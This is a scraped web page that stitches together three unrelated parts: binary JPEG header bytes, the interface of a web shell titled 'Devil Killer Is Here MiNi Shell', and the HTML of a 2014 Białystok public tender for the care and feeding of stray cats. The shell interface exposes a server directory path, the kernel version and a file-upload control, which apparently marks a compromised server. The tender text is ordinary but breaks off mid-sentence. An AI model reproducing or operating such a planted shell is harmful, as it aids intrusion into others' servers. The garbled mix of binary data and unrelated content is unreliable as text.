JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140220/59260-N-2014.html

<p class="kh_header"><b>Białystok: Świadczenie usług związanych z zapewnieniem opieki nad kotami bezdomnymi, wolno żyjącymi oraz odebranymi w wyniku interwencji oraz przeprowadzenie jesienno-zimowego dokarmiania kotów wolno żyjących na terenie Miasta Białegostoku.</b><br>
<b>Numer ogłoszenia: 59260 - 2014; data zamieszczenia: 20.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białystok , ul. Słonimska 1, 15-950 Białystok, woj. podlaskie, tel. 085 869 60 02, faks 085 869 62 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług związanych z zapewnieniem opieki nad kotami bezdomnymi, wolno żyjącymi oraz odebranymi w wyniku interwencji oraz przeprowadzenie jesienno-zimowego dokarmiania kotów wolno żyjących na terenie Miasta Białegostoku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:
1) świadczenie usług związanych z zapewnieniem opieki nad kotami bezdomnymi 
i wolno żyjącymi na terenie Miasta Białegostoku, stanowiące Część I zamówienia;
2)świadczenie usług związanych z zapewnieniem opieki nad kotami odebranymi 
w wyniku interwencji Straży Miejskiej, Policji, organizacji pozarządowych, których statutowym celem jest ochrona zwierząt na podstawie ustawy z dnia 21 sierpnia 1997 r. o ochronie zwierząt (Dz.U. z 2013 r. poz. 856), stanowiące Część II zamówienia; 3)przeprowadzenie jesienno-zimowego dokarmiania wolno żyjących kotów we współpracy ze społecznymi opiekunami kotów wraz z zakupem karmy, stanowiące Część III zamówienia.  2. Obszar objęty zamówieniem: miasto Białystok.
3. Zlecenia świadczenia usług związanych z zapewnieniem opieki nad kotami bezdomnymi, wolno żyjącymi oraz odebranymi w wyniku interwencji będą realizowane na podstawie telefonicznego zgłoszenia Zamawiającego, Straży Miejskiej, Policji. 4. Szczegółowy opis przedmiotu zamówienia: 4.1. Część I: 1) zapewnienie gotowości do podejmowania działań, określonych w ppkt. 2-7 przez okres trwania umowy wraz z  zapewnieniem możliwości transportu zwierząt; 2) zapewnienie fachowej opieki gwarantującej dobrą kondycję i zdrowotność dla 320 szt. zwierząt przez 30 dób, w tym: a) zapewnienie odpowiednich warunków lokalowych, b) zapewnienie właściwego żywienia, c) utrzymywanie zwierząt we właściwych warunkach zoohigienicznych, d) zapewnienie zwierzętom bezpieczeństwa i odpowiedniej ilości ruchu; 3) zapewnienie stałego dozoru i opieki weterynaryjnej wraz z wykonywaniem niezbędnych zabiegów weterynaryjnych; Przewidywana ilość zabiegów: 1 podstawowa opieka weterynaryjna nad 1 kotem,  w tym: odrobaczenie, odpchlenie, leczenie chorób wirusowych, leczenie świerzbu usznego, szczepienia - x 250 usług, 2 sterylizacja  1 kotki x 50 zabiegów, 3 kastracja  1 kocura - x 50 zabiegów, 4 uśpienie i utylizacja 1 ślepego kociaka -     x 30 zabiegów, 5 eutanazja i utylizacja 1 kota x 10 zabiegów, 6 wykonanie 1 badania (rtg, usg, gastroskopii itp.) x 10 badań, 7 wykonanie 1 zabiegu wraz z narkozą (zabieg chirurgiczny, operacja złamania, wyszycie cewki, zabieg dentystyczny itp.) - x 20 zabiegów, 4)  utylizacja zwłok zwierzęcych i innych odpadów organicznych; 5) prowadzenie dokumentacji, obejmującej: a) bieżącą dokumentację przyjmowanych zwierząt, w tym dokumentację zdjęciową zwierząt, b) rejestr wykonywanych usług wg karty zwierzęcia ( zgodnie ze wzorem przekazanym przez Zamawiającego w terminie 5 dni od dnia podpisania umowy), c) miesięczne raporty z realizacji niniejszej umowy przekazywane Zamawiającemu; 6) podejmowanie działań mających na celu znalezienie kotom nowych właścicieli bądź wypuszczanie na wolność zwierząt wolno bytujących, po zapewnieniu im odpowiedniego stanu zdrowotnego tj. dokonaniu niezbędnych zabiegów weterynaryjnych i zakończeniu ewentualnego leczenia; 7) Wykonawca winien dysponować samochodem przystosowanym do transportu kotów.
4.2. Część II:
1) zapewnienie gotowości do podejmowania działań, określonych w ppkt. 2-5 przez okres trwania umowy wraz z  zapewnieniem możliwości transportu zwierząt;
2) zapewnienie fachowej opieki gwarantującej dobrą kondycję i zdrowotność dla 25 szt. zwierząt przez 30 dób, w tym: a) zapewnienie odpowiednich warunków lokalowych, b) zapewnienie właściwego żywienia, c) utrzymywanie zwierząt we właściwych warunkach zoohigienicznych, d) zapewnienie zwierzętom bezpieczeństwa i odpowiedniej ilości ruchu; 3) zapewnienie stałego dozoru i opieki weterynaryjnej wraz z wykonywaniem niezbędnych zabiegów weterynaryjnych; Przewidywana ilość zabiegów: 1 podstawowa opieka weterynaryjna nad 1 kotem, w tym: odrobaczenie, odpchlenie, leczenie chorób wirusowych, leczenie świerzbu usznego, szczepienia - x 10 usług, 2 sterylizacja  1 kotki - x 1 zabieg, 3 kastrację  1 kocura	x 1 zabieg, 4 uśpienie i utylizacja 1 ślepego kociaka - x 5 zabiegów,
5 eutanazja i utylizacja 1 kota - x 5 zabiegów, 6 wykonanie 1 badania (rtg, usg, gastroskopii itp.) - x 4 badania, 7 wykonanie 1 zabiegu wraz z narkozą  (zabieg chirurgiczny, operacja złamania, wyszycie cewki, zabieg dentystyczny itp.) - x 4 zabiegi; 4) utylizacja zwłok zwierzęcych i innych odpadów organicznych;
5) prowadzenie dokumentacji, obejmującej: a) bieżącą dokumentację przyjmowanych zwierząt, w tym dokumentację zdjęciową przyjmowanych zwierząt,
b) rejestr wykonywanych usług wg karty zwierzęcia ( zgodnie ze wzorem przekazanym przez Zamawiającego w terminie 5 dni od dnia podpisania umowy),
c) miesięczne raporty z realizacji niniejszej umowy przekazywane Zamawiającemu;
4.3. Część III: 1) zakup w terminie do dnia 16 października 2014 r.  600 kg suchej karmy i 100 kg mokrej karmy dla kotów, 2) przeprowadzenie jesienno-zimowego dokarmiania wolno żyjących kotów we współpracy ze społecznymi opiekunami kotów, wpisanymi do rejestru społecznych opiekunów kotów prowadzonego przez Departament Ochrony Środowiska i Gospodarki Komunalnej Urzędu Miejskiego w Białymstoku, w sposób zapewniający im dobrą zdrowotność i kondycję, w tym: przechowywanie i przekazywanie zakupionej karmy, prowadzenie ewidencji i przekazywanie raportów w terminie od dnia 16 października 2014 r. do dnia 15 marca 2015 r. 5. Szczegółowy zakres zamówienia zawiera projekt umowy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego, polegających na powtórzeniu tego samego rodzaju zamówienia, określonego w rozdziale I siwz,  zgodnie z art. 67 ust. 1 pkt 6 ustawy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.20.00.00-1, 98.39.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I, II: W celu potwierdzenia spełnienia warunku Wykonawca winien wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał lub wykonuje  co najmniej 1 usługę, polegającą na zapewnieniu opieki, w tym opieki weterynaryjnej, nad co najmniej 30 zwierzętami (kotami lub/i psami) 
wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I, II: w celu potwierdzenia spełnienia warunku wykonawca winien wykazać się dysponowaniem osobami, które będą uczestniczyć w wykonywaniu zamówienia, 
w tym: co najmniej jedną osobą o zawodzie lekarza weterynarii, która będzie uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat  jej wykształcenia oraz informacją o podstawie do  dysponowania tą osobą</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Za główne usługi, których dotyczy obowiązek wskazania w wykazie i załączenia ww. dowodów, uznaje się usługi niezbędne do wykazania spełniania warunku określonego w sekcji III.3.2. - Zamawiający nie wymaga wskazania w wykazie informacji o usługach niewykonanych lub wykonanych nienależycie oraz wskazania w nim wszystkich wykonanych usług;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1) każdy Wykonawca zobowiązany jest złożyć oddzielnie dokumenty określone w sekcji III.4.2) tiret 2 oraz sekcji III.4.4) tiret 1; 2) warunki dotyczące wiedzy i doświadczenia, dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia będą badane łącznie  - dokumenty określone w sekcji III.4.1) tiret 1 - 3 powinien złożyć co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, 3) oświadczenie o spełnieniu warunków udziału w postępowaniu określone w sekcji III.4.1)  oraz oświadczenie o nie podleganiu wykluczeniu określone w sekcji III.4.2) tiret 1 składa pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z Wykonawców oddzielnie. 2.  2.	Zgodnie z art. 26 ust 2b) ustawy Pzp, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów (przedstawione w formie oryginału lub notarialnie poświadczonej kopii) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Zobowiązanie do udostępnienia zasobów w trybie art. 26 ust. 2b ustawy winno być sporządzone zgodnie z zasadami reprezentacji podmiotu, który takie zobowiązanie podejmuje. W przypadku innych podmiotów, na zasobach  których  Wykonawca  polega  na  zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów stanowiące dowody, muszą być poświadczane za zgodność z oryginałem przez te podmioty. 3. W celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Zamawiający żąda złożenia dokumentów dotyczących w szczególności: a) zakresu dostępnych wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 4.Dowodami, o których mowa powyżej  są:
1)	poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert.
2)	oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.

   W przypadku, gdy Zamawiający jest podmiotem, na rzecz, którego usługi wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów. 
 5.1)Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w sekcji III.4.3.1) tiret 1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.
2)Dokumenty, o których mowa w sekcji III.4.3.1) tiret 1 lub zastępujący je dokument o którym mowa wyżej, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 3)W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Białymstoku, Departament Ochrony Środowiska i Gospodarki Komunalnej, ul. J. K. Branickiego 9, 15-950 Białystok, pok. 117..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2014 godzina 09:45, miejsce: Urząd Miejski w Białymstoku, Departament Ochrony Środowiska i Gospodarki Komunalnej, ul. J. K. Branickiego 9, 15-950 Białystok.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług związanych z zapewnieniem opieki nad kotami bezdomnymi i wolno żyjącymi na terenie Miasta Białegostoku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług związanych z zapewnieniem opieki nad kotami bezdomnymi i wolno żyjącymi na terenie Miasta Białegostoku.
2. Szczegółowy opis przedmiotu zamówienia - Część I: 1) zapewnienie gotowości do podejmowania działań, określonych w ppkt. 2-7 przez okres trwania umowy wraz z  zapewnieniem możliwości transportu zwierząt; 2) zapewnienie fachowej opieki gwarantującej dobrą kondycję i zdrowotność dla 320 szt. zwierząt przez 30 dób, w tym: a) zapewnienie odpowiednich warunków lokalowych, b) zapewnienie właściwego żywienia, c) utrzymywanie zwierząt we właściwych warunkach zoohigienicznych, d) zapewnienie zwierzętom bezpieczeństwa i odpowiedniej ilości ruchu; 3) zapewnienie stałego dozoru i opieki weterynaryjnej wraz z wykonywaniem niezbędnych zabiegów weterynaryjnych; przewidywaną ilość zabiegów określa tabela: 1	podstawowa opieka weterynaryjna nad 1 kotem,  w tym: odrobaczenie, odpchlenie, leczenie chorób wirusowych, leczenie świerzbu usznego, szczepienia - x 250 usług, 2	sterylizacja  1 kotki - x 50 zabiegów, 3  kastracja  1 kocura -	x 50 zabiegów, 4 uśpienie i utylizacja 1 ślepego kociaka  - x 30 zabiegów,5 eutanazja i utylizacja 1 kota - x 10 zabiegów
6 wykonanie 1 badania (rtg, usg, gastroskopii itp.) - x 10 badań, 7 wykonanie 1 zabiegu wraz z narkozą (zabieg chirurgiczny, operacja złamania, wyszycie cewki, zabieg dentystyczny itp.) - x 20 zabiegów; 4)  utylizacja zwłok zwierzęcych i innych odpadów organicznych; 5)  prowadzenie dokumentacji, obejmującej:
a) bieżącą dokumentację przyjmowanych zwierząt, w tym dokumentację zdjęciową zwierząt, b) rejestr wykonywanych usług wg karty zwierzęcia ( zgodnie ze wzorem przekazanym przez Zamawiającego w terminie 5 dni od dnia podpisania umowy),
c) miesięczne raporty z realizacji niniejszej umowy przekazywane Zamawiającemu;
6) podejmowanie działań mających na celu znalezienie kotom nowych właścicieli bądź wypuszczanie na wolność zwierząt wolno bytujących, po zapewnieniu im odpowiedniego stanu zdrowotnego tj. dokonaniu niezbędnych zabiegów weterynaryjnych i zakończeniu ewentualnego leczenia; 7) Wykonawca winien dysponować samochodem przystosowanym do transportu kotów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.20.00.00-1, 98.39.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usług związanych z zapewnieniem opieki nad kotami odebranymi w wyniku interwencji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie usług związanych z zapewnieniem opieki nad kotami odebranymi w wyniku interwencji Straży Miejskiej, Policji, organizacji pozarządowych, których statutowym celem jest ochrona zwierząt na podstawie ustawy z dnia 21 sierpnia 1997 r. o ochronie zwierząt (Dz.U. z 2013 r. poz. 856). 2. Szczegółowy opis przedmiotu zamówienia - Część II:  1) zapewnienie gotowości do podejmowania działań, określonych w ppkt. 2-5 przez okres trwania umowy wraz z  zapewnieniem możliwości transportu zwierząt; 2) zapewnienie fachowej opieki gwarantującej dobrą kondycję i zdrowotność dla 25 szt. zwierząt przez 30 dób, w tym: a) zapewnienie odpowiednich warunków lokalowych, b) zapewnienie właściwego żywienia, c) utrzymywanie zwierząt we właściwych warunkach zoohigienicznych, d) zapewnienie zwierzętom bezpieczeństwa i odpowiedniej 